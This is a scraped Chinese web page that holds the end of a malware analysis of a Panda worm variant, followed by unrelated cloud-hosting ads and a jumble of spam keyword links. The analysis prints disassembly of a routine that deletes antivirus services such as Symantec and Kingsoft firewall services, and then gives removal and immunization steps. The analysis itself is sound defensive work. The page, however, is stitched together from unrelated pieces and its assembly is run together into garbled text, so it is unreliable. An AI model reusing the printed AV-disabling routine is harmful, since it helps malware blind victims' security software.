net六十九CODE:00407214callDel_ServiceCODE:00407219moveax,offsetaKpfwsvc"KPfwSvc"CODE:0040721EcallDel_ServiceCODE:00407223moveax,offsetaSndsrvc"SNDSrvc"CODE:00407228callDel_ServiceCODE:0040722Dmoveax,offsetaCcproxy"ccProxy"CODE:00407232callDel_ServiceCODE:00407237moveax,offsetaCcevtmgr"ccEvtMgr"CODE:0040723CcallDel_ServiceCODE:00407241moveax,offsetaCcsetmgr"ccSetMgr"CODE:00407246callDel_ServiceCODE:0040724Bmoveax,offsetaSpbbcsvc"SPBBCSvc"CODE:00407250callDel_ServiceCODE:00407255moveax,offsetaSymantecCoreLc"SymantecCoreLC"CODE:0040725AcallDel_ServiceCODE:0040725Fmoveax,offsetaNpfmntor"NPFMntor"CODE:00407264callDel_ServiceCODE:00407269moveax,offsetaMskservice"MskService"CODE:0040726EcallDel_ServiceCODE:00407273moveax,offsetaFiresvc"FireSvc"CODE:00407278callDel_ServiceCODE:0040727Dmovedx,offsetaSoftwareMicr_8"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:00407282moveax,HKEY_LOCAL_MACHINECODE:00407287callRegDeleteCODE:0040728Cmovedx,offsetaSoftwareMicr_9"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:00407291moveax,HKEY_LOCAL_MACHINECODE:00407296callRegDeleteCODE:0040729BretnCODE:0040729BKill_Av_ServicesendpCODE:0040729BCODE:0040729B这里的操作是:直接删除相关反病毒软件的服务.
使中毒后杀毒软件无法正常工作.
到这里为此病毒的分析也就基本完成,细节分析出来了,我也就不再做所谓的总结.
下面讲讲该病毒的清除.
熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net七十【解决方案】:清除方法:1、关闭网络共享,或者断开网络.
2、使用processExplorer将spoclsv.
exe进程终止,然后将机器上的所有desktop_.
ini文件删除.
3、使用msconfig之类的工具将svcshare项删除.
4、删除每个盘下的autorun.
inf文件和setup.
exe文件.
5、关闭系统的自动播放功能.
6、删除Drivers目录下的spoclsv.
exe文件.
7、使用ultraedit之类的工具将所有脚本文件的中的病毒代码清除.
8、清除完毕后,将登录密码设置复杂些,然后重启系统打全系统补丁.
9、对于这个版本,还得更新QQ补丁(因为这个版本有利用QQ漏洞进行传播).
这样基本上可以将该病毒清除.
下面说说免疫方法:对于这个变种版本可以做一个极端的做法:你自己在Drivers目录下创建"spoclsv.
exe"文件然后设置任何人都不允许访问和执行.
写在最后的话:这个病毒其实传播最主要的途径是通过挂马、漏洞方式进行传播.
如果你的系统安全补丁比较全,不随便下软件什么的中毒机率是比较低的.
全文完
近日华纳云商家正式上线了美国服务器产品,这次美国机房上线的产品包括美国云服务器、美国独立服务器、美国高防御服务器以及美国高防云服务器等产品,新产品上线华纳云推出了史上优惠力度最高的特价优惠活动,美国云服务器低至3折,1核心1G内存5Mbps带宽低至24元/月,20G ddos高防御服务器低至688元/月,年付周期再送2个月、两年送4个月、三年送6个月,终身续费同价,有需要的朋友可以关注一下。华纳云...
UCloud优刻得近日针对全球大促活动进行了一次改版,这次改版更加优惠了,要比之前的优惠价格还要低一些,并且新增了1核心1G内存的快杰云服务器,2元/首年,47元/年,这个价格应该是目前市面上最低最便宜的云服务器产品了,有需要国内外便宜VPS云服务器的朋友可以关注一下。UCloud好不好,UCloud服务器怎么样?UCloud服务器值不值得购买UCloud是优刻得科技股份有限公司旗下拥有的云计算服...
乐凝网络怎么样?乐凝网络是一家新兴的云服务器商家,目前主要提供香港CN2 GIA、美国CUVIP、美国CERA、日本东京CN2等云服务器及云挂机宝等服务。乐凝网络提供比同行更多的售后服务,让您在使用过程中更加省心,使用零云服务器,可免费享受超过50项运维服务,1分钟内极速响应,平均20分钟内解决运维问题,助您无忧上云。目前,香港HKBN/美国cera云服务器,低至9.88元/月起,支持24小时无理...
cmd.exe病毒为你推荐
glucanotransferasechrome支持ipad三星苹果5eacceleratoraccess violation问题的解决办法!勒索病毒win7补丁由于电脑没连接网络,所以成功躲过了勒索病毒,但最近要联网,要提前装什么补丁吗?我电脑断网好久了win10关闭445端口win10怎么关闭445的最新相关信息phpecho在php中 echo和print 有什么区别360chrome360的chrome浏览器进程有点多哦???联通iphone4联通iphone4怎么样,好不好用?联通iphone4联通iphone4跟苹果的iphone4有什么不一样? 比如少了什么功能? 还是什么的?
域名中介 php主机空间 工信部域名备案查询 什么是二级域名 a2hosting 国内加速器 好看qq空间 免空 789电视 傲盾官网 如何用qq邮箱发邮件 购买国外空间 电信托管 国内域名 购买空间 alertpay 热云 泥瓦工 web服务器硬件配置 ibm服务器机柜 更多